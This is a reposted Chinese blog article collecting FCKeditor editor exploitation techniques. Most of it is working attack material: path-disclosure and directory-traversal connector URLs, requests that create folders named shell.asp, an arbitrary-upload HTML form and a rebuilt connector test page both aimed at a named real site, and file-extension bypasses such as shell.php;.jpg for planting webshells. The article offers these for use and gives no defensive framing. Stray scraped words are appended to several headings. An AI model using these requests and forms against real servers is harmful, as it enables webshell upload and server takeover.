Fckeditor漏洞整理集合

時間  2019-12-18
標籤 fckeditor 漏洞 整理 集合 欄目 JavaScript 简体版
原文   原文鏈接

一、查看編輯器版本javascript

/fckeditor/editor/dialog/fck_about.htmlphp

二、爆絕對路徑html

FCKeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php(支持php的通殺)java

/FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/aspx/connector.aspx 2.5可突破shell

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.aspjsp

三、遍歷目錄編輯器

/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=../../post

Version 2.4.1 測試經過測試

修改CurrentFolder 參數使用 ../../來進入不一樣的目錄:網站

/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp

根據返回的XML 信息能夠查看網站全部的目錄。

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F

也能夠直接瀏覽盤符:

JSP 版本:

FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F

四、jsp上傳

/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector

/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp

五、Version < =2.4.2 For php 在處理PHP 上傳的地方並未對Media 類型進行上傳文件類型的控制,致使用戶上傳任意文件!將如下保存爲html文件,修改action地址。

[PHP]

<form id="frmUpload" enctype="multipart/form-data"action="http://www.sssie.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:
<input type="file" name="NewFile" size="50">
<input id="btnUpload" type="submit" value="Upload"></form>

六、 FCKeditor 文件上傳「.」變「_」下劃線的繞過方法

不少時候上傳的文件例如:shell.php.rar 或shell.php;.jpg 會變爲shell_php;.jpg 這是新版FCK 的變化。試試上傳1.asp;jpg

6.1:提交shell.php+空格繞過

不過空格只支持win 系統 *nix 是不支持的[shell.php 和shell.php+空格是2 個不一樣的文件 未測試。

6.2:繼續上傳同名文件可變爲shell.php;(1).jpg 也能夠新建一個文件夾,只檢測了第一級的目錄,若是跳到二級目錄就不受限制。

七、 突破創建文件夾

editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp

FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp

八、 FCKeditor 中test 文件的上傳地址

FCKeditor/editor/filemanager/browser/default/connectors/test.html

FCKeditor/editor/filemanager/upload/test.html

FCKeditor/editor/filemanager/connectors/test.html

FCKeditor/editor/filemanager/connectors/uploadtest.html

九、最古老的漏洞,Type文件沒有限制!

我接觸到的第一個fckeditor漏洞了。版本不詳,應該很古老了,由於程序對type=xxx 的類型沒有檢查。咱們能夠直接構造上傳把type=Image 改爲Type=hsren 這樣就能夠創建一個叫hsren的文件夾,一個新類型,沒有任何限制,能夠上傳任意腳本!

十、browser

FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=../../connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

十一、本地構造test文件

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>FCKeditor - Connectors Tests</title> <script type="text/javascript">function BuildBaseUrl( command ){ var sUrl = document.getElementById('cmbConnector').value + '?Command=' + command + '&Type=' + document.getElementById('cmbType').value + '&CurrentFolder=' + encodeURIComponent(document.getElementById('txtFolder').value) ; return sUrl ;}function SetFrameUrl( url ){ document.getElementById('eRunningFrame').src = url ; document.getElementById('eUrl').innerHTML = url ;}function GetFolders(){ SetFrameUrl( BuildBaseUrl( 'GetFolders' ) ) ; return false ;}function GetFoldersAndFiles(){ SetFrameUrl( BuildBaseUrl( 'GetFoldersAndFiles' ) ) ; return false ;}function CreateFolder(){ var sFolder = prompt( 'Type the folder name:', 'Test Folder' ) ; if ( ! sFolder ) return false ; var sUrl = BuildBaseUrl( 'CreateFolder' ) ; sUrl += '&NewFolderName=' + encodeURIComponent( sFolder ) ; SetFrameUrl( sUrl ) ; return false ;}function OnUploadCompleted( errorNumber, fileName ){ switch ( errorNumber ) { case 0 : alert( 'File uploaded with no errors' ) ; break ; case 201 : GetFoldersAndFiles() ; alert( 'A file with the same name is already available. The uploaded file has been renamed to "' + fileName + '"' ) ; break ; case 202 : alert( 'Invalid file' ) ; break ; default : alert( 'Error on file upload. Error number: ' + errorNumber ) ; break ; }}this.frames.frmUpload = this ;function SetAction(){ var sUrl = BuildBaseUrl( 'FileUpload' ) ; document.getElementById('eUrl').innerHTML = sUrl ; document.getElementById('frmUpload').action = sUrl ;} </script></head><body> <table height="100%" cellspacing="0" cellpadding="0" width="100%" border="0"> <tr> <td> <table cellspacing="0" cellpadding="0" border="0"> <tr> <td> Connector:<br /> <select id="cmbConnector" name="cmbConnector"> <option value="http://www.sssie.com/editor/filemanager/connectors/asp/connector.asp" selected="selected">ASP</option> <option value="ASP.Net</option'>http://www.sssie.com/editor/file ... aspx/connector.aspx">ASP.Net</option> <option value="cfm/connector.cfm">ColdFusion</option> <option value="lasso/connector.lasso">Lasso</option> <option value="perl/connector.cgi">Perl</option> <option value="PHP</option'>http://www.sssie.com/editor/file ... s/php/connector.php">PHP</option> <option value="py/connector.py">Python</option> </select> </td> <td> </td> <td> Current Folder<br /> <input id="txtFolder" type="text" value="/" name="txtFolder" /></td> <td> </td> <td> Resource Type<br /> <select id="cmbType" name="cmbType"> <option value="File" selected="selected">File</option> <option value="Image">Image</option> <option value="Flash">Flash</option> <option value="Media">Media</option> <option value="Invalid">Invalid Type (for testing)</option> </select> </td> </tr> </table> <br /> <table cellspacing="0" cellpadding="0" border="0"> <tr> <td valign="top"> <a href="#">Get Folders</a></td> <td> </td> <td valign="top"> <a href="#">Get Folders and Files</a></td> <td> </td> <td valign="top"> <a href="#">Create Folder</a></td> <td> </td> <td valign="top"> <form id="frmUpload" action="" target="eRunningFrame" method="post" enctype="multipart/form-data"> File Upload<br /> <input id="txtFileUpload" type="file" name="NewFile" /> <input type="submit" value="Upload" /> </form> </td> </tr> </table> <br /> URL: <span id="eUrl"></span> </td> </tr> <tr> <td height="100%" valign="top"> <iframe id="eRunningFrame" src="javascript:void(0)" name="eRunningFrame" width="100%" height="100%"></iframe> </td> </tr> </table></body></html>

做者:303Donatello 連接:https://www.jianshu.com/p/b0295978da77 來源:簡書 簡書著做權歸做者全部,任何形式的轉載都請聯繫做者得到受權並註明出處。
相關文章
相關標籤/搜索
每日一句
    每一个你不满意的现在,都有一个你没有努力的曾经。
本站公眾號
   歡迎關注本站公眾號,獲取更多信息
聯繫我們 最近搜索 最新文章 沪ICP备13005482号-10 MyBatis教程 SQL 教程 MySQL教程 Java 教程 Thymeleaf 教程 Hibernate教程 Spring教程 Redis教程